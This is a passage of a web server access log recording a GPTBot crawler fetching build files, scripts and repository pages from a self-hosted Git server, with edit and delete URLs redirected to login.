"/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/progress.marks?display=rendered" [Client 74.7.227.38] [Length 11072] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/progress.marks" -[17/Feb/2026:17:11:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/cmake.check_cache?display=rendered" [Client 74.7.227.38] [Length 11057] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:17:11:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/cmake.check_cache?display=rendered" [Client 74.7.227.38] [Length 11058] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:17:11:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/progress.marks?display=rendered" [Client 74.7.227.38] [Length 11101] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/progress.marks" -[17/Feb/2026:17:11:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" [Client 74.7.227.38] [Length 10472] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src" -[17/Feb/2026:17:11:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/__init__.cpython-312.pyc" [Client 74.7.227.38] [Length 10937] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__" -[17/Feb/2026:17:11:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/__init__.cpython-312.pyc" [Client 74.7.227.38] [Length 10907] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__" -[17/Feb/2026:17:11:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/assets/js" [Client 74.7.227.38] [Length 10300] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets" -[17/Feb/2026:17:12:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/chromedriver.exe" [Client 74.7.227.38] [Length 20320768] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/chromedriver.exe" -[17/Feb/2026:17:12:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 9958] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:17:12:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 14251] [Gzip 8.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:17:12:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake?display=rendered" [Client 74.7.227.38] [Length 11168] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" -[17/Feb/2026:17:12:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make?display=rendered" [Client 74.7.227.38] [Length 11162] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" -[17/Feb/2026:17:12:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake?display=source" [Client 74.7.227.38] [Length 12186] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" -[17/Feb/2026:17:12:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make?display=rendered" [Client 74.7.227.38] [Length 11149] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" -[17/Feb/2026:17:12:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" [Client 74.7.227.38] [Length 9964] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:17:12:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/__init__.cpython-312.pyc" [Client 74.7.227.38] [Length 9932] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/__init__.cpython-312.pyc" -[17/Feb/2026:17:12:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/__init__.cpython-312.pyc" [Client 74.7.227.38] [Length 9906] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/__init__.cpython-312.pyc" -[17/Feb/2026:17:12:06 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/.Backup/html/assets/js" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/js" -[17/Feb/2026:17:12:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/.Backup/html/assets/js" -[17/Feb/2026:17:12:07 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/.Backup/html/assets/js" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/js" -[17/Feb/2026:17:12:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/.Backup/html/assets/js" -[17/Feb/2026:17:12:07 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_upload/main/.Backup/html/assets/js" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/js" -[17/Feb/2026:17:12:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_upload/main/.Backup/html/assets/js" -[17/Feb/2026:17:12:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/assets/js/script.js" [Client 74.7.227.38] [Length 15132] [Gzip 4.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/js" -[17/Feb/2026:17:12:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/assets/js" [Client 74.7.227.38] [Length 9840] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/js" -[17/Feb/2026:17:12:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/assets/js/i18n.js" [Client 74.7.227.38] [Length 26520] [Gzip 6.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/js" -[17/Feb/2026:17:12:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/__init__.cpython-312.pyc" [Client 74.7.227.38] [Length 2414] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/__init__.cpython-312.pyc" -[17/Feb/2026:17:12:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/__init__.cpython-312.pyc" [Client 74.7.227.38] [Length 2414] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/__init__.cpython-312.pyc" -[17/Feb/2026:17:12:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake?display=source" [Client 74.7.227.38] [Length 12186] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" -[17/Feb/2026:17:12:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake?display=rendered" [Client 74.7.227.38] [Length 11167] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" -[17/Feb/2026:17:12:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make?display=source" [Client 74.7.227.38] [Length 11343] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" -[17/Feb/2026:17:12:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 9985] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&state=all&type=all" -[17/Feb/2026:17:12:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make?display=source" [Client 74.7.227.38] [Length 11343] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" -[17/Feb/2026:17:12:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make?display=rendered" [Client 74.7.227.38] [Length 11161] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" -[17/Feb/2026:17:12:13 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/html/assets/js/script.js" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/js/script.js" -[17/Feb/2026:17:12:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/html/assets/js/script.js" -[17/Feb/2026:17:12:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/assets/js/script.js" [Client 74.7.227.38] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/js/script.js" -[17/Feb/2026:17:12:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/html/assets/js/script.js" [Client 74.7.227.38] [Length 942] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/js/script.js" -[17/Feb/2026:17:12:15 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/html/assets/js/i18n.js" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/js/i18n.js" -[17/Feb/2026:17:12:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/html/assets/js/i18n.js" -[17/Feb/2026:17:12:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/.Backup/html/assets/js/script.js" [Client 74.7.227.38] [Length 15253] [Gzip 7.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/js/script.js" -[17/Feb/2026:17:12:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/assets/js/script.js" [Client 74.7.227.38] [Length 9851] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/js/script.js" -[17/Feb/2026:17:12:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/.Backup/html/assets/js/i18n.js" [Client 74.7.227.38] [Length 29445] [Gzip 11.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/js/i18n.js" -[17/Feb/2026:17:12:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/assets/js/i18n.js" [Client 74.7.227.38] [Length 20912] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/js/i18n.js" -[17/Feb/2026:17:12:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/assets/js/i18n.js" [Client 74.7.227.38] [Length 9850] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/js/i18n.js" -[17/Feb/2026:17:12:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/html/assets/js/i18n.js" [Client 74.7.227.38] [Length 938] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/js/i18n.js" -[17/Feb/2026:17:12:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make?display=rendered" [Client 74.7.227.38] [Length 11151] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" -[17/Feb/2026:17:12:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/types.ts?display=source" [Client 74.7.227.38] [Length 11541] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/types.ts" -[17/Feb/2026:17:12:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog_final.py" [Client 74.7.227.38] [Length 29497] [Gzip 8.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol" -[17/Feb/2026:17:12:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 72901] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project" -[17/Feb/2026:17:12:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/README.md?display=rendered" [Client 74.7.227.38] [Length 11337] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/README.md" -[17/Feb/2026:17:12:22 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/.Backup/html/assets/js/script.js" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/html/assets/js/script.js" -[17/Feb/2026:17:12:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/.Backup/html/assets/js/script.js" -[17/Feb/2026:17:12:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/xref-AssetPilot.html?display=source" [Client 